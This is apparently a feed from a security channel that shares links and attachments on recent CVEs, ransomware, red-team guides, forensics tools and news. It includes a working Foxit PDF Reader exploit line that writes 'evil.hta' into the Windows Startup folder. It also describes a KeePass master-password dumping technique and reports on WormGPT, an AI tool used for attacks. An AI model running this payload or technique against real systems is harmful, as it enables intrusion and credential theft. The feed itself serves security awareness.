ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access
Link : https://www.mandiant.com/resources/blog/alphv-ransomware-backup
@Engineer_Computer
keepass-password-dumper.zip
182 KB
🔓KeePass 2.X Master Password Dumper (CVE-2023-32784)
KeePass Master Password Dumper is a simple PoC tool used to dump the master password from KeePass's memory. Apart from the first password character, it is mostly able to recover the password in plaintext. No code execution on the target system is required, just a memory dump. It doesn't matter where the memory comes from - can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys) or RAM dump of the entire system. It doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then.
@Engineer_Computer
CVE-2023-27363.pdf
443.4 KB
🔥🔥🔥Foxit PDF Reader exportXFAData Exposed Dangerous Method RCE Vulnerability
(CVE-2023-27363) - PoC here.
The PoC is heavily based on the previous work by Sebastian Apelt aka bitshifter123, publicly available in this repository. It exploits a path traversal vuln (four backslashes) + arbitrary file write (HTA).
@Engineer_Computer
foxit_cve_2023-27363_extracted.js
9.4 KB
timeout = app.setTimeOut("event.target.exportXFAData({cPath: \"/c/users/\" + identity.loginName + \"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/evil.hta\"});
@Engineer_Computer
Mastering Bug Bounty.zip
895.3 KB
🔴 Mastering Bug Bounty: A Comprehensive Handbook for Ethical Hackers, authored by Aaron Rodriguez
@Engineer_Computer
The Red Team Guide.pdf
12.1 MB
The Red Team Guide: A practical guide for Red Teams and Offensive Security (241 pages)
@Engineer_Computer
Pentah0wnage: Pre-Auth RCE in Pentaho Business Analytics Server
Link : https://research.aurainfosec.io/pentest/pentah0wnage
@Engineer_Computer
Remote Code Execution Vulnerability in Azure Pipelines
Link : https://www.legitsecurity.com/blog/remote-code-execution-vulnerability-in-azure-pipelines-can-lead-to-software-supply-chain-attack
@Engineer_Computer
Malicious Self-Extracting Archives
Link : https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads
@Engineer_Computer
Australian Open Source Intelligence Gathering Resources, Australia's Largest Open Source Intelligence Repository for Cyber Professionals and Ethical Hackers
https://github.com/DFW1N/DFW1N-OSINT/
@Engineer_Computer
ELINT.pdf
563.7 KB
📡The E-Intelligence System
"Electronic Intelligence (ELINT), often known as E-Intelligence, is intelligence obtained through electronic sensors. Other than personal communications, ELINT intelligence is usually obtained. The goal is usually to determine a target's capabilities, such as radar placement. Active or passive sensors can be employed to collect data. A provided signal is analyzed and contrasted to collected data for recognized signal types.
The information may be stored if the signal type is detected; it can be classed as new if no match is found. ELINT collects and categorizes data. In a military setting (and others that have adopted the usage, such as a business), intelligence helps an organization make decisions that can provide them a strategic advantage over the competition. The term "intel" is frequently shortened. The two main subfields of signals intelligence (SIGINT) are ELINT and Communications Intel (COMINT)."
#Intelligence #SIGINT #ELINT #radar #signal #Electronic_Warfare #UAV #ESM
StackRot.zip
11.5 MB
🔥🔥🔥 Exploitation write-up & exploit code for StackRot (CVE-2023-3269) now available (GitHub repo)!
@Engineer_Computer
Scan with Wazuh and Nmap and feed the output to ChatGPT
@Engineer_Computer
Full lab at the link below
https://wazuh.com/blog/nmap-and-chatgpt-security-auditing/
Wazuh
Nmap and ChatGPT security auditing with Wazuh | Wazuh
Nmap (network mapper) is an open source security scanner used for network exploration and security auditing.
An overview of registry analysis
@Engineer_Computer
https://gbhackers-com.cdn.ampproject.org/c/s/gbhackers.com/windows-registry-analysis-tracking-everything-you-do-on-the-system/amp/
GBHackers Security | #1 Globally Trusted Cyber Security News Platform
Windows Registry Analysis - Tracking Every Activity That You Do on the Windows System
Another tool for examining and analysing the registry
Regripper
@Engineer_Computer
https://www.sans.org/blog/regripper-ripping-registries-with-ease/
www.sans.org
SANS Digital Forensics and Incident Response Blog | RegRipper: Ripping Registries With Ease | SANS Institute
A tool that makes hacking easier
WormGPT
With this tool, novice hackers can carry out malicious actions at a more advanced level. 😱
@Engineer_Computer
https://www.scmagazine.com/news/threat-intelligence/crimeware-tool-wormgpt-ai-bec
SC Media
Crimeware tool WormGPT: AI for BEC attacks
Cybercriminals are cashing in on the generative AI hype with a dedicated version of the technology catering to crooks
@Engineer_Computer.pdf
88 KB
🗒 Bypassing XSS Detection Mechanisms
@Engineer_Computer
Where one ought to know, one cannot always know:
Microsoft still doesn't know! ⛳️
Microsoft says it still doesn't know how Chinese hackers stole an inactive Microsoft account (MSA) consumer signing key used to breach the Exchange Online and Azure AD accounts of two dozen organizations, including government agencies.
@Engineer_Computer
https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/microsoft/microsoft-still-unsure-how-hackers-stole-azure-ad-signing-key/amp/
www-bleepingcomputer-com.cdn.ampproject.org
Microsoft still unsure how hackers stole Azure AD signing key